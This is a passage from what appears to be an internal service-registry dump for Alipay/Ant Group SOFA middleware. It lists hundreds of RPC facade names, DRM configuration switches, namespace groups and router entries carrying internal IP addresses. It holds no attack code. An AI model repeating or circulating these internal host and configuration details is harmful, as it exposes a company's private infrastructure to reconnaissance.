service.facade.api.SmsMessageSendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.InstanceQueryApi:1.0:v2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Sub_Servers_TP_O_MDEVSUPPORT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finstore.common.service.facade.fop.mng.ShopDynamicLayoutItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.chargefront.RevenueShardingDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.meshyopt.common.service.facade.api.ActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@finpromoprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zprodmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.manualEndDate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_B_TRADE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.rds.common.service.facade.service.RdsCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedData2SyncTable4CheckDrmImpl.needLoadSceneTypeList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vegameta.common.service.facade.event.EventAttrQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insendorseprod.common.service.inst.InsCsEndorsementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.TransConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfpcenter.common.service.facade.api.account.CfpAccountVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.176.237#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocenter.biz.activity.service.HumanToHumanMaterialFundAccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.antfeature.api.SimpleAntFeatureFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:openexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.208.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fopSiteProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:tnpmregistry@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:opssla-ANTINS@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:antdsm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemsgprod.common.service.facade.admin.catalog.MsgCatalogAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.96.139#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ordermng.common.service.api.order.OrderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.common.service.integration.afts.FileOperateClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditsceneprod.facade.PcreditGoodsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.Fund123AssetFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:zbdm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mobilegw-spi-adapter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipaybuserviceAuthTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.seekers.facade.apis.SpiConfigSaveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_removeRestrictCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.findecision.biz.shared.SystemConfig.newDecisionSwitchWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.chaos.dig.facade.ArchDomainFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.accreditcore.common.service.facade.CreditAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:unifiedMsgTransferExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.OperatorFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtaskcenter.common.service.facade.template.TaskTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:agdscdecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.bizrecon.CertificateServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:pcreditbenefit@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.145.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchservbase.biz.service.leads.facade.LeadsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.payment.PaymentAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.pointprod.common.util.resource.ApiResultHandlerResource.mapiSpecialFailXmlSource,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.243.230#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitydata:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorTransmitResource.upUserIdTransType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemsgprod.common.service.facade.audittask.LifeMsgAuditTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.SubCardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.116.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.facade.UserInfoManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.open.facade.admin.OpenAdminManagementFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:openhome@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:morderprod_riskRejectCallBackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.43.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbopenprod.common.service.facade.recruit.RecruitQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.clientmanager.acauth.AcauthQueryBasicService.queryContent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.identitydecision.common.facade.antfeature.OpenFeatureServiceClient:1.0:identitydecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.counter.api.CounterFacadeV3:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.DataLoadService:1.0:vehownerprod-ccb-central-zk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.confmng.ChargeInstGeographyMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.clerktone.facade.api.goldenclerk.GoldenClerkManagerGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linepay.common.serivce.facade.mng.terminal.operator.MerchantTerminalAddService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.revol.drm.tenant.cifperm.selfHealMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.gfas:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.omocore.common.service.facade.VirtualPhoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insttrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_PRODTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitydata:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.airbops:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.InsProductDrmClient.electronicPolicyInstIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finconsumeprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.96.162#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fininfoDataTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findecision.common.service.facade.query.ChannelSwitcherStatusQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:stockassetcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpensionprod.common.service.facade.fusion.PensionFusionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.member.MemberActivityManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexclienttrdcenter.service.facade.api.PricingResultQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecoqltprod.common.service.facade.tinyapp.TinyappContactFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.KBAIdentityVerificationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:aeicore#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insmobile:name=com.alipay.insmobile.biz.service.impl.schedule.GroupBuyingTaskDRM.taskThreadSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.crmhome.common.service.facade.menu.CrmMenuPageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.85.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_C_DISCOUNT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.253.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secuinfos.biz.news.shared.publisher.MsgPublisherService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finecorisk.common.facade.service.api.FinecoriskTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.alphad.common.service.facade.dataset.api.IDatasetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.schedulerweb.service.facade.operate.TaskOperateFacade:1.0:schedulerweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifglobal:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.middlewareSwitch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acccenter.common.service.facade.system.YuqueServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paymentmng.service.facade.payacceptance.PmngDeployGroupManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.InstMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.BatchTodoOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.punish.MrchProdPunishFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.65.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.renewalEmotionMessageDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.jiuzhou.facade.ipay.IpayBgReleaseQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.classPathWhiteListConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpdcore:name=com.alipay.fin.pdcore.core.service.innerclient.master.drm.MasterConfigDRM.enableClientRefresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.Arch:name=com.alipay.chargefront.core.service.config.ChargeFrontCommonDrm.ratingCosultSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.228.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.quotstore.common.manage.facade.api.EmendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.33.158#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_TEST_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_Q_QUALITY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cdp.common.service.facade.space.api.CdpSpaceAuthorityApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.servicelibrary.ServiceLabelMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.finfocore.FinfoprodConfigDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_C_LUCKYFOREST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_S_1251#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.179.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.version.SceneVersionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.zpaas.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.clearingcenter.shareClearingDataSource.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.app.AppAdminManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantClassificationGzoneQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dockerlabapp:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:monthReportAgreeCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.facade.service.BuzUnitServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:bknetflowsecmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:tableAuth_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.dataanalyzer.ReferenceAnalyzerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finxbff.coverage.facade.CoverageTrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.159#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchportalcore.common.service.facade.actionrecord.ActionRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.processmngTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.CreditAgreementQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.batchpayprod.service.facade.loan.CdbUserRecoverQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.common.service.facade.api.topology.TopologyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.operation.OperationInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ngfesync.facade.daas.meta.NgfeMetaFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:abnclprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.community.api.incomerank.IncomeRankGwManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.dataset.DataSetService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileaix.common.service.facade.SceneBizFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.248#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fintranscore.common.service.facade.bank.api.BankPreAuthUserPurchaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTair.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.msgopprod.common.service.facade.operationlog.MsgOperationLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillOweInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.comparacenter.common.service.facade.client.ComParaUniformQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.common.service.facade.query.SchedulerQueryFacade:1.0:ANTINS@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.ProductUseService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settleprod.service.facade.agency.PartnerAddressFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityLocationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antopo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.68.186#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_CLIVECENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.socialcore.facade.ps.user.UserRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","accorderexprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_open_foreign_account@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsettle.biz.service.common.test.SoapUITest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tradequote.api.HeartbeatQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.baymax.maintainess.drm.taskFirstAidDRM.app_finfocore.firstAid,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDowngradeDrmImpl.completeStarWishTransactionDowngrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecashier.senior.service.facade.MobilecashierChannelFacade:1.0:pcreditdecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pcalp.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.clearingcenter:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.sp.business.BusinessMessageQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antinvest.api.facade.HsFlowTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acpartner.common.service.facade.RebateRevokeFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.zcache.tbase.fingiftprodTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.sandboxhome:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.ipay.igdmc.biz.service.GlobalDataSyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.45.69.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:iexpprod_supergw_in@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.0.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.poscore.common.service.facade.FinanceInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:approdcenter_brsRecycleProcesscallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.232.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.shared.drm.CommonShareDrm.lockReleaseExeNumPerTable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lifemng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcomment.common.service.facade.comment.PraiseUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableVsar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudprovision:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.caprod.biz.sign.facade.SignFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebSysDepositService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecPositionTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.ServerLogFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:antprocess@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:socplt@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.92.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.promocommopt:name=com.alipay.promocommopt.common.drm.HeatDrmResource.topicVoteMessage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cashiercore.service.facade.spi.CashierCoreBizCallbackService:1.0:accorderexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.0.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fbepservice.facade.oneid.OneIdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.spr-fund-fixed-execute-unknown.normalTaskPaused,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfpcenter.emc.common.service.facade.api.EmcRiskEventQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.isNeedQueryTbPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tallycore.common.service.facade.AccountBookFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.gmcommon.common.drm.GmCommonDrmValueResource.determineRuleConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.tmallpcard.api.TmallPCardtransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.analysis.Ins